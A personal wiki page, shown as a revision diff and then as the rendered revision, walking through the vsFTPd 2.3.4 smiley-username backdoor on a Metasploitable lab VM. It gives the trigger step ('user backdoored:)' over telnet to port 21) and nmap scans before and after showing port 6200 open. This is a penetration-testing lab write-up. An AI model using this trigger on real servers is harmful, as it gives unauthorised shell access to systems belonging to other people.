Metasploitable/VSFTP: Difference between revisions
From charlesreid1
| Line 4: | Line 4: | ||
If a client attempts to connect using a username that ends in a smiley <code>:)</code>, it opens a backdoor shell listening on port 6200. | If a client attempts to connect using a username that ends in a smiley <code>:)</code>, it opens a backdoor shell listening on port 6200. | ||
=Opening the Backdoor= | |||
The procedure for opening a backdoor on port 6200 with VSFTP is as follows: | |||
We begin by scanning the Metasploitable virtual machine at 10.0.0.27, to show that port 6200 is closed: | |||
<pre> | |||
root@morpheus:~# nmap -sS -sV -A -p 6200 10.0.0.27 | |||
Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 06:29 PDT | |||
Nmap scan report for 10.0.0.27 | |||
Host is up (0.00083s latency). | |||
PORT STATE SERVICE VERSION | |||
6200/tcp closed unknown | |||
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) | |||
Too many fingerprints match this host to give specific OS details | |||
Network Distance: 1 hop | |||
TRACEROUTE | |||
HOP RTT ADDRESS | |||
1 0.83 ms 10.0.0.27 | |||
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |||
Nmap done: 1 IP address (1 host up) scanned in 2.96 seconds | |||
</pre> | |||
Now, in another window, we open the backdoor: | |||
<pre> | |||
root@morpheus:~# telnet 10.0.0.27 21 | |||
Trying 10.0.0.27... | |||
Connected to 10.0.0.27. | |||
Escape character is '^]'. | |||
220 (vsFTPd 2.3.4) | |||
user backdoored:) | |||
331 Please specify the password. | |||
pass doesnotmatter | |||
</pre> | |||
You can close that window - you're done with it. | |||
Now take a look at the same port 6200 with nmap: | |||
<pre> | |||
root@morpheus:~# nmap -sS -sV -A -p 6200 10.0.0.27 | |||
Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 06:30 PDT | |||
WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? | |||
WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? | |||
WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? | |||
WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? | |||
WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? | |||
WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? | |||
Nmap scan report for 10.0.0.27 | |||
Host is up (0.00088s latency). | |||
PORT STATE SERVICE VERSION | |||
6200/tcp open unknown | |||
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : | |||
SF-Port6200-TCP:V=7.01%I=7%D=3/25%Time=56F53D70%P=x86_64-pc-linux-gnu%r(Ge | |||
SF:nericLines,42,"sh:\x20line\x201:\x20\r:\x20command\x20not\x20found\nsh: | |||
SF:\x20line\x202:\x20\r:\x20command\x20not\x20found\n"); | |||
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) | |||
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port | |||
Device type: general purpose | |||
Running: Linux 2.4.X | |||
OS CPE: cpe:/o:linux:linux_kernel:2.4.21 | |||
OS details: Linux 2.4.21 | |||
Network Distance: 1 hop | |||
TRACEROUTE | |||
HOP RTT ADDRESS | |||
1 0.88 ms 10.0.0.27 | |||
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |||
Nmap done: 1 IP address (1 host up) scanned in 13.94 seconds | |||
Revision as of 13:35, 25 March 2016
The Background
VSFPT is an ftp server program. The particular version of VSFTP included on the Metasploitable virtual machine contains a vulnerability that opens a backdoor shell.
If a client attempts to connect using a username that ends in a smiley :), it opens a backdoor shell listening on port 6200.
Opening the Backdoor
The procedure for opening a backdoor on port 6200 with VSFTP is as follows:
We begin by scanning the Metasploitable virtual machine at 10.0.0.27, to show that port 6200 is closed:
root@morpheus:~# nmap -sS -sV -A -p 6200 10.0.0.27 Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 06:29 PDT Nmap scan report for 10.0.0.27 Host is up (0.00083s latency). PORT STATE SERVICE VERSION 6200/tcp closed unknown MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.83 ms 10.0.0.27 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.96 seconds
Now, in another window, we open the backdoor:
root@morpheus:~# telnet 10.0.0.27 21 Trying 10.0.0.27... Connected to 10.0.0.27. Escape character is '^]'. 220 (vsFTPd 2.3.4) user backdoored:) 331 Please specify the password. pass doesnotmatter
You can close that window - you're done with it.
Now take a look at the same port 6200 with nmap:
root@morpheus:~# nmap -sS -sV -A -p 6200 10.0.0.27 Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 06:30 PDT WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? Nmap scan report for 10.0.0.27 Host is up (0.00088s latency). PORT STATE SERVICE VERSION 6200/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port6200-TCP:V=7.01%I=7%D=3/25%Time=56F53D70%P=x86_64-pc-linux-gnu%r(Ge SF:nericLines,42,"sh:\x20line\x201:\x20\r:\x20command\x20not\x20found\nsh: SF:\x20line\x202:\x20\r:\x20command\x20not\x20found\n"); MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4.21 OS details: Linux 2.4.21 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.88 ms 10.0.0.27 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.94 seconds